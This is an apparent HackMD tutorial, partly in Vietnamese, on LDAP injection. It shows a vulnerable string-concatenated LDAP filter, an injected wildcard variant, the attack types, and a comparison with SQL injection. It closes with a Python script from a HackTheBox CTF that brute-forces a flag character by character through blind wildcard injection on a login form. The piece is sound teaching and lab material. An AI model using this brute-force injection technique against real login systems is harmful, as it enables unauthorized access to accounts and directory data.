Try   HackMD

LDAP Injection

Introduction

  • LDAP (Lightweight Directory Access Protocol) injection is a type of security exploit that is used to compromise the authentication process used by some websites. Websites that construct LDAP statements from user data are vulnerable to this type of attack.

  • LDAP directories store objects, which include information about these users and the organization's assets. For example, an LDAP directory may contain lists of the different usernames, passwords and email addresses of the users in the organization. If an LDAP directory is used for website authentication, an attacker can enter malicious code into a user input field, gain unauthorized access to the directory, and view or change usernames and passwords.

LDAP injection work

Ví dụ về truy vấn LDAP lấy 2 giá trị truyền vào là username và pass:

find("(&(cn=" + username +")(userPassword=" + pass +"))")

Vì cách viết nối chuỗi và không lọc kí tự đầu vào. Truy vấn có thể như sau:

find("(&(cn=*)(cn=*))(|(cn=*)(userPassword=" + pass +"))")

What types of LDAP injection attacks are there?

  1. Authentication bypass
  2. Elevation of access privileges
  3. Resource disclosure
  4. Blind attack

The diffence between SQLi and LDAP injection

  • All of these injection attacks take advantage of scenarios where an application fails to properly sanitize user input.
  • The difference between LDAP and SQL injection is the protocol or language that they exploit, and therefore the syntax of the attack data. LDAP is a protocol for accessing information in directories, whereas SQL is a query language for databases. Therefore, the attacks target different information stores.

For example:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Bài PhoneBook HackTheBox là ví dụ điển hình cho bài viết trên.





















import requests
import string
import urllib.parse

url = "http://161.35.162.182:32216/login"

string =string.ascii_letters + string.digits + "_}{"
password = "HTB{d1rectory_"

for i in range(1,30):
  for j in string:
    print(j,end='\r')
    a = password + j + "*"
    data = {"username":"Reese","password":a}
    r = requests.post(url = url, data = data)
    if "Authentication" not in r.url:
      password += j
      print(password)
      break
Last changed by 
onsra03
0
92

Read more

Phân tích lỗ hổng 1 day Odoo

Affects: Odoo 11.0 through 13.0 (Community and Enterprise Editions)CVE ID: CVE-2020-29396

Dec 5, 2024
CVE-2019-18211

Một số thông tin về CVE:

Oct 22, 2024
.NET JavaScriptSerializer Deserialization Vulnerability

Nguyên văn trang chủ Microsoft:

Sep 22, 2024
WSO2-2022-2182 Analysis

WSO2-2022-2182 Analysis

May 23, 2024
Read more from onsra03
Published on HackMD